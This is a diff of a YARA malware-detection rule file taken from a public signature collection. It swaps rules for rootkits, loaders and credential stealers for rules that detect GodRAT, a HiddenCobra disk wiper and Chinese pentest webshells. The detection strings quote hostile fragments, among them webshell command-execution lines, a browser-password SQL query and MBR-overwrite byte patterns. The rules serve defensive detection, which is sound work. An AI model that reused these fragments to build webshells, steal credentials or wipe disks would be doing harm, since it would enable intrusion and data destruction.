+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f817c9826089b49d251b8a09a0e9bf9b4b468c6e2586af60e50afe48602f0bec"
 
 	strings:
-		$x1 = "%s\\Microsoft\\ttmp.log" fullword wide
-		$a1 = "logins.json" fullword ascii
-		$s1 = "https://www.google.com/accounts/servicelogin" fullword ascii
-		$s2 = "https://login.yahoo.com/config/login" fullword ascii
-		$s3 = "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login" ascii
-		$s4 = "\\mozsqlite3.dll" ascii
-		$s5 = "SMTP Password" fullword ascii
-		$s6 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword ascii
+		$s1 = "cmd /c hostname >>" fullword ascii
+		$s2 = "Mstray.exe" fullword ascii
+		$s3 = "msupdata.exe" fullword ascii
+		$s5 = "Windows\\CurrentVersion\\run" fullword ascii
+		$s6 = "Content-Type: */*" fullword ascii
+		$s11 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or ( $a1 and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 3 of them
 }
-rule SIGNATURE_BASE_MAL_Netfilter_Dropper_Jun_2021_1_1 : FILE
+
+rule SIGNATURE_BASE_MAL_CRIME_RAT_WIN_PE_Godrat_Aug25 : GODRAT RAT WINDOWS GH0ST_RAT GETGOD FILE
 {
 	meta:
-		description = "Detects the dropper of Netfilter rootkit"
-		author = "Arkbird_SOLG"
-		id = "d91f48aa-9580-572d-a72c-19b80624cdbe"
-		date = "2020-06-18"
+		description = "Detects GodRAT malware targeting Windows systems"
+		author = "Arda Buyukkaya"
+		id = "94cb826c-81f9-5254-ad23-71efc21f403d"
+		date = "2025-08-23"
+		modified = "2025-09-09"
+		reference = "https://securelist.com/godrat/117119/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_win_pe_godrat_aug25.yar#L4-L79"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "154e800ed1719dbdcb188c00d5822444717c2a89017f2d12b8511eeeda0c2f41"
+		logic_hash = "eda3175277bbf9f6408f5d2dd25d6780552aad4104fe62bb92125c734f9fdd98"
+		score = 75
+		quality = 83
+		tags = "GODRAT, RAT, WINDOWS, GH0ST RAT, GETGOD, FILE"
+		family = "GodRAT"
+		victims = "Financial services"
+
+	strings:
+		$winrt_txt = "C++/WinRT version" ascii wide nocase
+		$api_blob = {
+         4E 74 43 72 65 61 74 65 53 65 63 74 69 6F 6E 00                          // NtCreateSection
+         4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 00              // NtMapViewOfSection
+         4E 74 55 6E 6D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 00 00 00  // NtUnmapViewOfSection
+      }
+		$ld_movups = { 0F 10 05 ?? ?? ?? ?? }
+		$ld_movq = { F3 0F 7E 05 ?? ?? ?? ?? }
+		$st_movups = { 0F 11 85 ?? ?? ?? ?? }
+		$st_movq = { 66 0F D6 85 ?? ?? ?? ?? }
+		$scan_loop = { 8A 01 41 84 C0 75 F9 }
+		$cmp_len_770 = { 81 FF 70 07 00 00 0F 82 ?? ?? ?? ?? }
+		$cmp_len_76C = { 81 FF 6C 07 00 00 0F 82 ?? ?? ?? ?? }
+
+	condition:
+		pe.is_pe and filesize <= 10MB and ( ( $winrt_txt and ( pe.imphash ( ) == "0f4b0270c84616ce594b6a84c47a7717" ) ) or ( ( $ld_movups or $ld_movq ) and ( ( #st_movups >= 2 ) or ( #st_movq >= 2 ) or ( #st_movups >= 1 and #st_movq >= 1 ) ) and $scan_loop and $api_blob and ( $cmp_len_770 or $cmp_len_76C ) ) or pe.imphash ( ) == "ee5ea868d8233000216e7b29bc8cb4e2" )
+}
+rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_1 : FILE
+{
+	meta:
+		description = "Detects HiddenCobra Wiper"
+		author = "NCCIC Partner"
+		id = "4978c190-7b66-5cea-96df-809f85620986"
+		date = "2017-12-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_netfilter.yar#L4-L26"
+		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_wiper.yar#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b70eb5d2d234d0f523c41fa146f315cf7239bbe7a988b393e75ea6cf6aa438d3"
+		logic_hash = "0e88b7f8491e87cce0deb5f246ca521bdb556b9c79c697559bdf8b0b332e714e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
-		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
-		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
-		tlp = "White"
-		adversary = "Chinese APT Group"
 
 	strings:
-		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
-		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
-		$s1 = "%s\\netfilter.sys" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
-		$s3 = "\\\\.\\netfilter" fullword ascii
+		$mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 }
+		$controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and filesize < 1000KB and ( all of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and any of them
 }
-rule SIGNATURE_BASE_MAL_Netfilter_May_2021_1_1 : FILE
+rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_2 : FILE
 {
 	meta:
-		description = "Detects Netfilter rootkit"
-		author = "Arkbird_SOLG"
-		id = "0ac01eb3-435b-52b0-b8e8-ace2ebb34f60"
-		date = "2020-06-18"
+		description = "Detects HiddenCobra Wiper"
+		author = "NCCIC Partner"
+		id = "75acc3cb-90dd-58e8-b094-ed3f28650b1b"
+		date = "2017-12-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_netfilter.yar#L28-L52"
+		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_wiper.yar#L22-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba72bbc38c27d0c8d6eea7d513c3ca40276edd929c93abae4098639f7d7649a5"
+		logic_hash = "f537f67be28f854db0d56199d2a43f90cf6c80469a6f9853db0cd550440c7e1f"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
-		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
-		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
-		tlp = "White"
-		adversary = "Chinese APT Group"
 
 	strings:
-		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
-		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
-		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
-		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
-		$s1 = "%sc=%s" fullword ascii
-		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
-		$s3 = "NETIO.SYS" fullword ascii
+		$PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide
+		$ExtendedWrite = { B4 43 B0 00 CD 13 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and filesize < 1000KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and all of them
 }
-rule SIGNATURE_BASE_Mal_Babbleloader_Win_Jan24 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php5 : FILE
 {
 	meta:
-		description = "This rule detects intrinsic patterns of BabbleLoader."
-		author = "0x0d4y"
-		id = "b2f18ab3-b4df-4e2f-aa23-de8694beb221"
-		date = "2025-01-27"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/babbleloader-technical-malware-analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_babbleloader_win_jan24.yar#L1-L24"
+		description = "Webshell from CN Honker Pentest Toolset - file php5.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ee063c4c-af06-520f-acfe-fba758b84d3c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fa3d03c319a7597712eeff1338dabf92"
-		logic_hash = "d4f7915146b1f3fe50febc231247e14323e9d68a94b2b9c8149a5727c06162ca"
-		score = 100
+		hash = "0fd91b6ad400a857a6a65c8132c39e6a16712f19"
+		logic_hash = "e882f115a67fe31ece1a81e1a2770b46370a92ac3aa23e348a12cdb5735e8a0e"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str_decryption_algorithm = { 48 63 44 24 ?? 48 8b 4c 24 ?? 0f b6 04 ?? 33 44 ?? ?? 0f b6 4c ?? ?? d2 c8 48 63 4c ?? ?? 48 8b 54 ?? ?? 88 04 0a 6b 44 24 ?? ?? 89 44 ?? ?? 8b 44 24 ?? ff c0 89 44 24 }
-		$hashing_algorithm = { 48 8b 44 24 ?? 0f be ?? 89 44 24 ?? 8b 44 24 ?? 89 44 24 ?? 48 8b 44 24 ?? 48 ff c0 48 89 44 24 ?? 83 7c 24 08 ?? ?? ?? 8b 44 24 ?? 8b 0c ?? 03 c8 8b c1 89 04 24 8b 44 24 ?? 05 ?? ?? ?? ?? 8b 0c 24 0f af c8 8b c1 89 04 }
-		$halos_gate = { 48 8b 44 24 ?? 0f b6 ?? 83 f8 4c 0f ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 ?? ?? 3d 8b ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d d1 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d b8 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85 c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 88 44 ?? ?? 48 8b 44 24 ?? 0f b6 40 ?? 88 44 ?? ?? 0f b6 44 ?? ?? c1 e0 08 0f b6 4c ?? ?? 0b c1 48 8b 8c ?? ?? ?? ?? ?? 89 01 ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 00 3d e9 }
-		$get_syscall_offset = { 4d 33 db 4c 8b d9 c3 }
-		$jump_syscall_offset = { 4c 8b d1 41 8b 03 41 ff 63 ?? }
+		$s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii
+		$s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"<b>\".$" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $str_decryption_algorithm and $hashing_algorithm and ( 1 of ( $halos_gate , $get_syscall_offset , $jump_syscall_offset ) )
+		uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Deviceguard_WDS_Evasion : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Test3693 : FILE
 {
 	meta:
-		description = "Detects WDS file used to circumvent Device Guard"
+		description = "Webshell from CN Honker Pentest Toolset - file test3693.war"
 		author = "Florian Roth (Nextron Systems)"
-		id = "469b60d4-43d3-5a85-aa51-e453d8c858c0"
-		date = "2015-01-01"
-		modified = "2023-01-06"
-		reference = "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_deviceguard_evasion.yar#L2-L17"
+		id = "58fe4445-b2e1-5d5f-8c46-39c6ae78f845"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4be9d7c34f7bafeb53db4fc1262a3692493b2253b0de7dc97480b01b62a9f12c"
+		hash = "246d629ae3ad980b5bfe7e941fe90b855155dbfc"
+		logic_hash = "a10618d54fb7adbbd89a10f2e1ac067ccd1832140bcaf3b92394ebe7323f2d1e"
 		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "r @$ip=@$t0" ascii
-		$s2 = ";eb @$t0+" ascii
-		$s3 = ".foreach /pS" ascii
+		$s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii
+		$s2 = "http://www.topronet.com </font>\",\" <font color=red> Thanks for your support - " ascii
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Tidepool_Malware : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Mycode12 : FILE
 {
 	meta:
-		description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
+		description = "Webshell from CN Honker Pentest Toolset - file mycode12.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eec12fd7-f5f8-5bee-98e0-2111766deb55"
-		date = "2016-05-24"
+		id = "2ce7368c-7565-5b32-94d1-c87023404c5b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/m2CXWR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tidepool.yar#L8-L32"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "759920ed7c9320e8412ed0644b28922a545b04f7549f0da6d6c67d6af8a7af3e"
-		score = 75
+		hash = "64be8760be5ab5c2dcf829e3f87d3e50b1922f17"
+		logic_hash = "94cb0e414634af753db9ec0c63a3a34b4f9104e93e01d67cebab7b3a0c471198"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
-		hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
-		hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
-		hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
-		hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
 
 	strings:
-		$x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
-		$x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
-		$x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
-		$x4 = "IEComDll.dat" fullword ascii
-		$s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
-		$s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s3 = "network.proxy.socks_port\", " fullword ascii
+		$s1 = "<cfexecute name=\"cmd.exe\"" fullword ascii
+		$s2 = "<cfoutput>#cmd#</cfoutput>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) ) ) or ( 4 of them )
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Offlibrary : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file offlibrary.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b506069-8185-5dc0-bf64-90646f6bab6b"
-		date = "2018-06-21"
+		id = "c01f7c8b-a6bd-5094-9574-8cc853698607"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L13-L29"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e94111abe83aa500bfa35a3a7c2d43c3ed4011bc540401f047e84cfc27204ca"
-		score = 75
+		hash = "eb5275f99211106ae10a23b7e565d208a94c402b"
+		logic_hash = "ffec24bedfe0794e8f92da5067c41932339e61ec23d71a67ed4b634434cd10d6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59509a17d516813350fe1683ca6b9727bd96dd81ce3435484a5a53b472ff4ae9"
 
 	strings:
-		$s1 = "idocback.dll" fullword ascii
-		$s2 = "constructor or from DllMain." fullword ascii
-		$s3 = "appmgmt" fullword ascii
-		$s4 = "chksrv" fullword ascii
+		$s0 = "';$i=$g->query(\"SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING" ascii
+		$s12 = "if(jushRoot){var script=document.createElement('script');script.src=jushRoot+'ju" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		filesize < 1005KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_Xl : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file xl.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc1cfcc8-64a0-5da0-8ff7-147da8a3af0b"
-		date = "2018-06-21"
+		id = "5c8d1301-fe20-50e0-86ac-99a220cd4be1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L31-L46"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L76-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ddd3dee11e25ea40fa3cc578c6a836ea850359a5914d5eb5d16ea4340827b91b"
-		score = 75
+		hash = "49c3d16ee970945367a7d6ae86b7ade7cb3b5447"
+		logic_hash = "b6683a24ad58a9444ec91f13e7da5db3e3e768afded09a23e1bbd0a0c23cf6b9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1fc9f7065856cd8dc99b6f46cf0953adf90e2c42a3b65374bf7b50274fb200cc"
 
 	strings:
-		$s1 = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" fullword ascii
-		$s2 = "ProbeScriptFint" fullword wide
-		$s3 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
+		$s0 = "<input name=\"DESTINATION\" value=\"" ascii
+		$s1 = "<CFFILE ACTION=\"Write\" FILE=\"#Form.path#\" OUTPUT=\"#Form.cmd#\">" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		uint16( 0 ) == 0x433c and filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Linux : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Webshell from CN Honker Pentest Toolset - file linux.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67ea7ed1-954f-5b3e-b058-452be3b6fdfa"
-		date = "2018-06-21"
+		id = "8d94f1c5-2139-5d0d-8af9-9c30a0359910"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L48-L62"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L93-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f1617829ccf7da6ee2e9f692fbf1f61d3f1c6a17103db85190d6a8b4fca69328"
-		score = 75
+		hash = "78339abb4e2bb00fe8a012a0a5b7ffce305f4e06"
+		logic_hash = "2c6278acd123e0d41ed4f0f8f0da27d5de1ad56efb8102c9eae442838a0416d0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0d2abdcaad99e102fdf6574b3dc90f17cb9d060c20e6ac4ff378875d3b91a840"
 
 	strings:
-		$s1 = "C:\\Windows\\SysNative\\cmd.exe" fullword ascii
-		$s2 = "C:\\Windows\\SysNative\\sysprep\\cryptbase.dll" fullword ascii
+		$s0 = "<form name=form1 action=exploit.php method=post>" fullword ascii
